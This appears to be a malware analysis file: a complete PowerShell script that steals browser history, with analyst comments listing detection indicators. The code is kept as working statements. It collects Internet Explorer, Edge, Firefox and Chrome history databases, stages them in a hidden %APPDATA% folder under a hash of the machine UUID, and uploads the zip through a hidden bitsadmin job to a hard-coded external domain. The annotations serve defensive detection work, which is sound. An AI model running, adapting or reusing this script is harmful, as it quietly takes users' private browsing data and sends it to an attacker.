# Analyst annotation (defensive): this script collects browser-history artifacts
# for the current user, zips them under %APPDATA% and uploads the archive with a
# BITS job via a hidden cmd.exe. The statements below are the original ones;
# only comments and line breaks were added. Detection anchors worth logging:
#   - powershell.exe -> cmd.exe -> bitsadmin.exe process chain (twice: /reset, then /transfer ... /upload)
#   - a BITS upload job with a random 16-letter name (BITS-Client operational log)
#   - WMI query of Win32_ComputerSystemProduct (machine UUID) followed by writes to
#     %USERPROFILE%\AppData\Roaming\<first 6 chars of UUID>\<md5>.tmp / .zip
#   - recursive Get-ChildItem over IE/Edge WebCache, Firefox places.sqlite and Chrome History paths

# Hidden cmd.exe runs "bitsadmin /reset", which cancels the user's existing BITS jobs
# before the upload job is created. The mixed-case -wiNdowStylE parameter name looks
# like case-mangling to defeat naive string matching — TODO confirm against other samples.
$krgujhas='/C bitsadmin /reset'; start-process -wiNdowStylE HiDden cmd.exe $krgujhas;

# Machine identity: the system UUID from WMI. Its first 6 characters name the staging
# directory; the full UUID plus the computer name seed the per-host hash below.
$comID = (Get-WmiObject Win32_ComputerSystemProduct).UUID ; $comP=$comID.Substring(0,6); $fp=$env:userprofile+'\AppData'; $hPath=$fp+'\Roaming\'+$comP;

# MD5 of (UUID + ComputerName), lower-cased hex, via the legacy System.Web
# FormsAuthentication helper. This value is reused as the staging file stem and as
# both query parameters of the upload URL, so it is a stable per-host identifier
# that can be correlated across network and file-system telemetry.
[Reflection.Assembly]::LoadWithPartialName("System.Web")
$hMD5=[System.Web.Security.FormsAuthentication]::HashPasswordForStoringInConfigFile($comID+$env:ComputerName, "MD5").tolower()

# Staging paths: <hash>.tmp (concatenated plaintext) and <hash>.zip (what is uploaded).
$hFile=$hPath+'\'+$hMD5+'.tmp'; $zipFN = $hPath+'\'+$hMD5+'.zip'
If(!(test-path $hPath)){New-Item -ItemType Directory -Force -Path $hPath}
# Remove leftovers from a previous run; errors are silently swallowed.
try{ Remove-Item $hFile}catch{}
try{ Remove-Item $zipFN}catch{}

# Artifact enumeration. `$fp'\...'` in argument mode appears to concatenate the
# variable with the literal suffix — verify on the target PowerShell version.
# -Force includes hidden items; -ErrorAction SilentlyContinue hides access errors.
#   IE "Last Active" session-recovery *.dat files
$iel=Get-ChildItem -Path $fp'\Local\Microsoft\Internet Explorer\Recovery\Last Active\' -Filter "*.dat" -Recurse -ErrorAction SilentlyContinue -Force
#   IE Indexed DB *.log files
$ief=Get-ChildItem -Path $fp'\Local\Microsoft\Internet Explorer\Indexed DB\' -Filter "*.log" -Recurse -ErrorAction SilentlyContinue -Force
#   WebCache (IE/Edge-legacy browsing history database) *.log files
$ier=Get-ChildItem -Path $fp'\Local\Microsoft\Windows\WebCache' -Filter "*.log" -Recurse -ErrorAction SilentlyContinue -Force
#   Firefox places.sqlite (history/bookmarks), any profile under Roaming
$ff=Get-ChildItem -Path $fp'\Roaming' -Filter places.sqlite -Recurse -ErrorAction SilentlyContinue -Force
#   Chrome "History" SQLite database, any profile under Local\Google
$chrome=Get-ChildItem -Path $fp'\Local\Google' -Filter History -Recurse -ErrorAction SilentlyContinue -Force

# Each hit is appended to the single staging file through Get-Content | out-file,
# i.e. as text rather than raw bytes, so the copies are probably not byte-exact —
# TODO confirm. Every loop and read is wrapped in try/catch with empty handlers,
# so missing browsers, locked databases and indexing errors never abort the run.
try{ for ($i=0; $i -le $iel.length; $i++){ try{Get-Content $iel[$i].fullname | out-file -append $hFile}catch {} } }catch {}
try{ for ($i=0; $i -le $ief.length; $i++){ try{Get-Content $ief[$i].fullname | out-file -append $hFile}catch {} } }catch {}
try{ for ($i=0; $i -le $ier.length; $i++){ try{Get-Content $ier[$i].fullname | out-file -append $hFile}catch {} } }catch {}
try{ Get-Content $ff.fullname | out-file -append $hFile }catch {}
try{ Get-Content $chrome.fullname | out-file -append $hFile }catch {}

# Pack the staging file into <hash>.zip with .NET System.IO.Compression, then delete
# the plaintext .tmp; only the .zip remains on disk for the upload.
Add-Type -assembly 'System.IO.Compression'
Add-Type -assembly 'System.IO.Compression.FileSystem'
[System.IO.Compression.ZipArchive]$ZipFile = [System.IO.Compression.ZipFile]::Open($zipFN,([System.IO.Compression.ZipArchiveMode]::Create))
[System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($ZipFile, $hFile, (Split-Path $hFile -Leaf))
$ZipFile.Dispose()
try{Remove-Item $hFile}catch{}

# Exfiltration: a random 16-letter (A-Z, a-z) BITS job name, then
# "bitsadmin /transfer <name> /upload <hard-coded HTTPS endpoint>?s=<hash>&m=<hash> <zip>"
# launched through another hidden cmd.exe. The bare `$hrefefr;` statement writes the
# full command line to the pipeline/stdout, so it will appear in PowerShell
# transcripts and script-block logs when those are enabled.
$tgervg= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_});
$hrefefr='/C bitsadmin /transfer '+$tgervg+' /upload "https://bfhchb2.eu/zu.php?s='+$hMD5+'&m='+$hMD5+'" "'+$zipFN+'"';
$hrefefr;
start-process -wiNdowStylE hidden cmd.exe $hrefefr;